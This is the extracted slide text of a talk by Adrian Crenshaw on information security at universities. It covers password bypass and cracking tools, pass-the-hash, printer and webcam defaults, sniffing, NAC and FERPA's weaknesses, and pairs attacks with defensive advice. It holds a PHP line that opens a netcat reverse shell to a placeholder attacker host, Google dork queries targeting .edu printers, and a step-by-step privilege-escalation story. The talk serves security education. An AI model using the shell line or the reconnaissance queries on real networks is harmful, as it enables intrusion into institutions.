Transcript phukd

Adrian Crenshaw
http://Irongeek.com





I run Irongeek.com
I have an interest in InfoSec
education
I don’t know everything - I’m just a
geek with time on my hands
Sr. Information Security Engineer at
a Fortune 1000
Co-Founder of Derbycon
http://www.derbycon.com
http://Irongeek.com
Twitter: @Irongeek_ADC




This is a broad subject, too broad
Give you something to think about
Going to try to suggest cheap/free tools to solve
problems
More notes here:
http://www.irongeek.com/i.php?page=security/uni
versity-campus-security-2013
http://Irongeek.com








What are the differences?
Open by design
Lack of physical control
BYOD (Bring Your Own Device) is standard
Early Adoption/Legacy
Apps with little regard to security
Politics/Organizational Problems
Legal Stuff
http://Irongeek.com

Bandwidth




Free resources




Botnets
Pivots
Free Hosting
Books/Articles
Aaron Swartz & JSTOR is a sad case of admins going too far
Research Information
Grades/Tests/Notes

Forced directory browsing for the win!
http://Irongeek.com



The point is to learn (in theory)
Learning is the product, not widgets or whatever
Experimentation is needed to learn




Can I run a service on this?
Where can I put my website?
Where can I run my code?
Try telling tenured faculty they can’t run a server?
http://Irongeek.com
Old software never dies
“But I just got to use this BASICA app”
 Time tables for testing
 Assumption of Admin access
Mitigation:
 Figure out needed registry and file system
permissions
 Procmon
http://technet.microsoft.com/enus/sysinternals/bb896645.aspx

http://Irongeek.com
Frequent nuke and rebuilds
 SteadyState – no longer supported
 Achieving the effect with built in tech
http://technet.microsoft.com/enus/library/gg176676%28WS.10%29.aspx
Commercial
 Deep Freeze
http://www.faronics.com
 Alternatives
http://alternativeto.net/software/deep-freeze/

http://Irongeek.com






Besides crappy apps, there is malware
Nuke it from orbit, it’s the only way to be sure
Symantec Ghost
Open Source Alternatives:
http://www.osalt.com/ghost
Train users to put their files in a know location
Windows Easy Transfer
http://windows.microsoft.com/enus/windows7/products/features/windows-easytransfer
http://Irongeek.com


Attackers are already on the soft chewy center of
the “Candy Analogy”
Remember the axiom:
“If a bad guy has unrestricted physical access to
your computer, it's not your computer anymore.“
~ Microsoft or Dr. David Salomon
http://Irongeek.com




Password Resets
Password Bypass
Pass the Hash
Password Cracking
http://Irongeek.com





Offline NT Password & Registry Editor, Bootdisk/CD
http://pogostick.net/~pnh/ntpasswd/
Bart's PE Builder
http://www.nu2.nu/pebuilder
Windbuilder
http://reboot.pro
Sala's Password Renew
http://www.sala.pri.ee
NTPWEdit
http://cdslow.webhost.ru/en/ntpwedit/
http://Irongeek.com






Kon-Boot
http://www.piotrbania.com/all/kon-boot/
Subverts Boot Process
Blank a password in Windows on login
Reboot and authentication goes back to normal
Some locally stored passwords will not work
Nirsoft’s Password Recovery tools:
http://www.nirsoft.net
http://Irongeek.com



Portable Boot Devices (USB/CD/DVD)
http://www.irongeek.com/i.php?page=videos/port
able-boot-devices-usb-cd-dvd
Building a boot USB, DVD or CD based on Windows
7 with WinBuilder and Win7PE SE Tutorial
http://www.irongeek.com/i.php?page=security/win
builder-win7pe-se-tutorial
Dual booting Winbuilder/Win7PE SE and Backtrack
5 on a USB flash drive with XBOOT
http://www.irongeek.com/i.php?page=videos/xboo
t-backtrack-winbuilder-dual-boot
http://Irongeek.com


Some may be thinking:
"Those are just the patron access machines - my
staff workstations and file servers are still safe
because they are behind locked doors."
Let me share my little horror story about network
privilege escalation:
http://Irongeek.com
1.
First frat boy Bob becomes a local admin on a workstation
using a boot device.
2.
He then copies off the SAM and SYSTEM files for later cracking with
Cain or Hashcat
http://www.oxid.it/cain.html
http://hashcat.net
I've done tons of videos/articles over the years on password cracking,
so I'll point you to some of those:


Cracking Windows Vista/XP/2000/NT Passwords via SAM and SYSKEY with Cain,
Ophcrack, Saminside, BKhive, Samdump2 etc
http://www.irongeek.com/i.php?page=security/cracking-windows-vista-xp-2000-ntpasswords-via-sam-and-syskey-with-cain-ophcrack-saminside-bkhive-etc
Password Exploitation Class
http://www.irongeek.com/i.php?page=videos/password-exploitation-class
http://Irongeek.com
3.
4.
5.
Many folks use the same local admin passwords on
all of the boxes they deploy, allowing Bob to attack
other boxes from across the network using the
cracked credentials.
Bob then installs a software key logger to gain even
more credentials as faculty, staff and students login
to the compromised workstation.
Repeat leap frogging.
http://Irongeek.com



Pass the Hash
Metasploit's psexec
http://www.metasploit.com/
Pass the Hash Tool Kit
http://corelabs.coresecurity.com/index.php?modul
e=Wiki&action=view&type=tool&name=Pass-TheHash_Toolkit
http://Irongeek.com

Cached Domain Credentials




MSCash and MSCash v2
http://openwall.info/wiki/john/MSCash
http://openwall.info/wiki/john/MSCash2
Cain & Able
http://www.oxid.it/cain.html
Hashcat
http://hashcat.net
Browser, Mail Client, etc.

http://www.nirsoft.net
http://Irongeek.com


Don’t store local passwords
Don’t use LMHASHs



No default local admin, but custom (HASH(MAC+SK))
Locked BIOS Unified Extensible Firmware Interface (UEFI)





Control what people can boot from
Support issues for reimaging
Better lock the case too


New OS or greater that 15 character passwords
Cheap lock = crap lock
Prohibitively expensive to do better.
More on passwords in a bit
None of it stops hardware key loggers
http://Irongeek.com

Even professors from Comp Sci/Infosec may not
know tech details




Defining Pen-test to two Infosec professors
Defining what a USB hub was to another
Silly attitudes:
"Additionally, Mr. Crenshaw's personal website,
housed on university resources, is a compendium of
links to know computer hacker websites, hacker
toolkits, and other hacker resources.“ ~ Larry Mand
The word hacker freaks them out a bit
http://Irongeek.com






Sterling Riggs WDRB Facebook
Post September 26:
“I don't know how I feel about
this--DerbyCon happening at
Hyatt downtown. It's a convention
for computer hackers.”
Lot’s of prejudicial comments
I pointed it out to my infosec buds
on Twitter, and tons of Infosec
folks showed up to defend
hackerdom and the conference
Post since deleted
But Jayson E. Street
(@jaysonstreet) saved some
Eve Adams got in the last words I
saw:
"Kill em with kindness. Hack em
with hugs."
http://Irongeek.com



Ethics, or lack there of
You get fired for what you do
do, not for what you don’t.
Why rock the boat?
Tenure



No, you change your IP scheme
How do you enforce rules on
those that can’t be fired?
Like High school cliques, but
with more grey hair and tweed
http://Irongeek.com





The plural of a anecdote is not evidence, but…
The Foundation for Individual Rights in Education
http://thefire.org
Look over the timeline for the Jerry Sandusky case
Look up the origin of the Clery Act
No, not all schools are this way (I hope)
http://Irongeek.com



They have always been doing it, did not have a term
for Bring you own device
Flat Networks
NAC (Network Access Control)


Better be more than MAC Address (ifconfig, MadMACs)
Crapware on box need to check system AV and
patch level


http://www.packetfence.org
http://freenac.net (Maybe dead)
http://Irongeek.com

Remote password attacks



Noisy
Slow
Default passwords




No passwords are common on printers
Network gear
Webcams/Teleconference
DRACs
http://Irongeek.com

Printers
Data leaks/Docs
 DoS
 Free print jobs
 Stored passwords


DRACs (or other management)


Webcams/Teleconferencing


Remote control
Passwords on desks?
SoHo NASes
http://Irongeek.com


Softperfect’s NetScan
http://www.softperfect.com/products/networksca
nner/
RAWR (Rapid Assessment of Web Resources) from
Adam Byers & Tom Moore (@RapidWebEnum)
http://sourceforge.net/projects/rawr-webenum/
http://Irongeek.com
http://Irongeek.com
http://Irongeek.com


http://www.exploit-db.com/google-dorks/
Examples:
Ricoh Savins
intitle:"web image monitor" site:edu
"/web/user/en/websys/webArch/mainFrame.cgi"
site:edu
inurl:"/en/sts_index.cgi" site:edu
HP Jetdirects (Varies greatly from model to model)
inurl:hp/device/this.LCDispatcher site:edu
CUPS Connected Printers
inurl:":631/printers" -php -demo site:edu
http://Irongeek.com





Some scanners will just tell you
THC-Hydra
http://www.thc.org/thc-hydra/
Medusa
http://www.foofus.net/~jmk/medusa/medusa.ht
Brutus
http://www.hoobie.net/brutus/
Default Password Lists (or just Google)
http://www.phenoelit.org/dpl/dpl.html
http://www.cirt.net/passwords
http://Irongeek.com





Default password of a new account?
Passwords reused to often, known by too many,
never changed
Frequent resets cause people to write it down (or
more support calls)
Password Patterns
Passwords over
Passphrase
2740 = 1.7970103e+57
9610 = 5.9873694e+19
http://Irongeek.com
http://Irongeek.com
https://xkcd.com/936/




Facebook started on university campuses
Students are way too free with information
OSInt, Cyberstalking, Footprinting and Recon:
Getting to know you
http://www.irongeek.com/i.php?page=videos/osint
-cyberstalking-footprinting-recon
Curious George Bronk
http://Irongeek.com




How many organizations of about 7000 people have
a class B?
Got in early, got a lot of space
Don’t have to NAT for numbering reasons, so a lot
of stuff is on the public Internet
Some problems:
Open ports or everything!
 Reconfigure devices
 Reverse DNS

http://Irongeek.com
nmap -sL 123.123.*/*
Nmap scan report for pm-cser-loanbox.papermill.edu
(123.123.104.120)
Nmap scan report for pm-sscs-hh10500.papermill.edu
(123.123.104.121)
Nmap scan report for pm-buse-jsmith02.papermill.edu
Nmap scan report for npi10adab.papermill.edu
(123.123.118.67)
http://Irongeek.com



Firewall it off
Turn it off
Watch for defaults when sharing files





Things get shared with too many folkS
NetScan is awesome for finding these
Do they really need it?
Walled Off Experimentation Labs
Virtual Machines
http://Irongeek.com



User training
Who’s an admin?
SOHO NAS, and why are they there?
http://Irongeek.com





Anyone doing it?
Open Source Helpers
Graylog2
http://graylog2.org
OSSIM
http://sourceforge.net/projects/os-sim
Security Onion
http://securityonion.blogspot.com
http://Irongeek.com





Does the page allow for scripting?
Packages kept up to date
Old web apps never die
PHP Example
$x = shell_exec("nc AttackingBoxIP 30 -e cmd ");
Web Shells
http://www.irongeek.com/i.php?page=videos/oisf2013/webshells-historytechniques-obfuscation-and-automated-collection-adrian-crenshaw


OWASP (Open Web Application Security Project)
https://www.owasp.org
Web Application Pen-testing Tutorials With Mutillidae
http://www.irongeek.com/i.php?page=videos/web-application-pen-testingtutorials-with-mutillidae
http://Irongeek.com


Corporate Network can get away with more
because of physical perimeter (sort of)
Insecure protocols
HTTP
 FTP
 SMTP
 Telnet

http://Irongeek.com




Password sniffing
Files/Print Jobs
Cookie/session hijacking
Common sniffing tools




Wireshark
http://www.wireshark.org
NetworkMiner
http://www.netresec.com/
Cain
http://www.oxid.it/cain.html
Ettercap
http://ettercap.github.io/ettercap/
http://Irongeek.com






Protocol replacements
IDS/IPS/ARPWatch
LAN segmentation
Network Sniffers Class for the Kentuckiana ISSA 2011
http://www.irongeek.com/i.php?page=videos/networksniffers-class
Static ARP
ARPFreeze
http://www.irongeek.com/i.php?page=security/arpfreezestatic-arp-poisoning
http://Irongeek.com
Do you know what is out there?
 Professors, students and staff could be hooking anything up
 NAC may give some info
 Nmap
http://nmap.org
 Nagios
http://www.nagios.org
Commercial:
 Nessus
http://www.tenable.com
 Nexpose
http://www.rapid7.com

http://Irongeek.com
Better than it use to be
 WSUS great for Windows clients you control
http://technet.microsoft.com/enus/windowsserver/bb332157.aspx
Commercial:
 Shavlik
http://www.shavlik.com
 Secunia CSI (can be uses with WSUS)
http://secunia.com
Open Source:
 http://wsuspackagepublisher.codeplex.com

http://Irongeek.com




Open Wireless can be sniffed (duh!)
Lots of legacy system exist that may not be able to
use WPA/2 Enterprise (getting better)
VPN over open WiFi was a common option
Not so useful



Disabling SSID Broadcasting
MAC Address Filtering
Evil twin attacks
http://Irongeek.com







Universities hit everything across the board
Most of these others in the audience will know better than I
PCI DSS (Payment Card Industry Data Security Standard)
HIPAA/HITECH (Health Insurance Portability and
Accountability Act / Health Information Technology for
Economic and Clinical Health Act)
FISMA/FIPS (Federal Information Security Management Act
of 2002 / Federal Information Processing Standards)
IRB (Institutional Review Board)
FERPA (Family Educational Rights and Privacy Act)

Let’s dive into this
http://Irongeek.com
Turn off the video now
http://Irongeek.com

Three main parts
1.
2.
3.


Give students access to their records
The ability to amend records
To control disclosure of student records
Only for Schools getting money form U.S.
Department of Education programs
Why it is pretty fucking useless!
http://Irongeek.com

No individual right to sue


See Gonzaga University v. Doe
Can’t find a case of any university ever loosing
funding because of a breach


Have there been no breaches?
Just not enforced?
http://Irongeek.com
Two Quotes:

"If, as a result of the hearing, the school still decides not to amend the
record, the eligible student has the right to insert a statement in the
record setting forth his or her views"

"Thus, while FERPA affords eligible students the right to seek to amend
education records which contain inaccurate information, this right
cannot be used to challenge a grade or an individual's opinion, or a
substantive decision made by a school about a student."

Amendment clause has exceptions (that covers all possibilities)
Grades
 Statements or Opinions
 “Substantive” Decision
 What is left?


Overall Conclusion: FERPA has no teeth
http://Irongeek.com



Mostly links, sorry
Slides will be up when I post the video, but most
are in the article
If you experiences are different, I’d live to here
them



Private/State/ Commercial
Teaching vs. Research
Government Research
http://Irongeek.com
Derbycon
Sept ?th-?th, 2014
Derbycon Art Credits to DigiP
Photo Credits to KC (devauto)
http://www.derbycon.com
Others
http://www.louisvilleinfosec.com
http://skydogcon.com
http://hack3rcon.org
http://Irongeek.com
http://outerz0ne.org
http://phreaknic.info
http://notacon.org
42
Twitter: @Irongeek_ADC
http://Irongeek.com